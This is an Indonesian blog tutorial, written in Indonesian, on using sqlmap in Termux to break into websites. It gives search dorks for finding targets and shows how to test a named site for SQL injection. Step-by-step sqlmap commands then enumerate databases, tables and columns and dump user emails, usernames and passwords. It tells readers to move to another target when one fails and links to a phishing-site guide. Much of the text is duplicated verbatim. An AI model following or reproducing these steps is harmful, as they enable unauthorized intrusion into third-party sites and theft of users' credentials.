Cara menggunakan sqlmap di termux untuk mengetahui isi database
Assalamualaikum wr wb
Pada artikel kali ini. Saya akan memberitahukan bagaimana cara menggunakan sqlmap di termux.
Sqlmap ini script di termux untuk penetrasi sebuah web. Bagaimana cara-caranya. Simak berikut.
Bahan:
- Apk termux, kalau belum punya silahkan download Disini
- Koneksi internet
- Dork:
- store.php?=id
- product.php?=id
Cara menggunakannya:
1. Pertama ketikkan dork diatas di browser
2. Masuklah ke website yang akan dijadikan target
3. Untuk mengetahui webnya vuln atau tidak tambahkan tanda ' di paling belakang sendiri untuk mengecek apakah web tersebut vuln atau tidak.
Contoh:
http://coda.cc/product/product.php?id=4'
Dan hasilnya jadi seperti ini.
http://coda.cc/product/product.php?id=4%27
4. Jika webnya vuln maka akan muncul pesan seperti dibawah ini.
Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
SELECT tbl_store.* FROM tbl_store WHERE store_id =1
4. Terus kalian buka termux, kemudian kalian ikuti perintah-perintah di bawah ini
$ apt update && apt upgrade
$ pkg install python2
$ pkg install python
$ pkg install figlet
$ pkg install git
$ git clone https://github.com/sqlmapproject/sqlmap
$ cd sqlmap
Untuk menjalankannya ketikkan perintah
$ python2 sqlmap.py
5. Setelah sudah mengisi script diatas tersebut lalu kalian isi perintah
$ python2 sqlmap.py -u http://namaweb.com/store.php?id21%27 --dbs
Tunggu sebentar sampai berhasil. Jika berhasil akan muncul database seperti di bawah ini:
available databases [2]:
[*] information_schema
[*] nama_database
Jika tidak berhasil. Cari target yang lain
6. Jika berhasil ketikkan
$ python2 sqlmap.py -u http://namaweb.com/store.php?id21%27 -D nama database --tables
Setelah anda mengetik diatas. Maka akan muncul tables/file database tersebut
7. Langkah selanjutnya adalah ketik
$ python2 sqlmap.py -u http://namaweb.com/store.php?id21%27 -D nama database -T nama tables --columns
9. Untuk dump email target ketikkan perintah
$ python2 sqlmap.py -u http://namaweb.com/store.php?id21%27 -D nama database -T nama tables -C email, username,pass --dump
Maka dari itu, akan muncul email, password user.
Baca juga: Cara membuat web phising yang mudah
Sekian dari kami semoga bermanfaat bagi kalian semua. Kami mengucapkan mohon maaf bila ada kesalahan tulisan yang salah dan tidak berkenan. Saya akhiri
Waalaikumsalam Wr wb
$ apt update && apt upgrade
$ pkg install python2
$ pkg install python
$ pkg install figlet
$ pkg install git
$ git clone https://github.com/sqlmapproject/sqlmap
$ cd sqlmap
Untuk menjalankannya ketikkan perintah
$ python2 sqlmap.py
5. Setelah sudah mengisi script diatas tersebut lalu kalian isi perintah
$ python2 sqlmap.py -u http://namaweb.com/store.php?id21%27 --dbs
Tunggu sebentar sampai berhasil. Jika berhasil akan muncul database seperti di bawah ini:
available databases [2]:
[*] information_schema
[*] nama_database
Jika tidak berhasil. Cari target yang lain
6. Jika berhasil ketikkan
$ python2 sqlmap.py -u http://namaweb.com/store.php?id21%27 -D nama database --tables
Setelah anda mengetik diatas. Maka akan muncul tables/file database tersebut
7. Langkah selanjutnya adalah ketik
$ python2 sqlmap.py -u http://namaweb.com/store.php?id21%27 -D nama database -T nama tables --columns
9. Untuk dump email target ketikkan perintah
$ python2 sqlmap.py -u http://namaweb.com/store.php?id21%27 -D nama database -T nama tables -C email, username,pass --dump
Maka dari itu, akan muncul email, password user.
Baca juga: Cara membuat web phising yang mudah
Sekian dari kami semoga bermanfaat bagi kalian semua. Kami mengucapkan mohon maaf bila ada kesalahan tulisan yang salah dan tidak berkenan. Saya akhiri
Waalaikumsalam Wr wb
4 comments :
Post a Comment
Leave A Comment...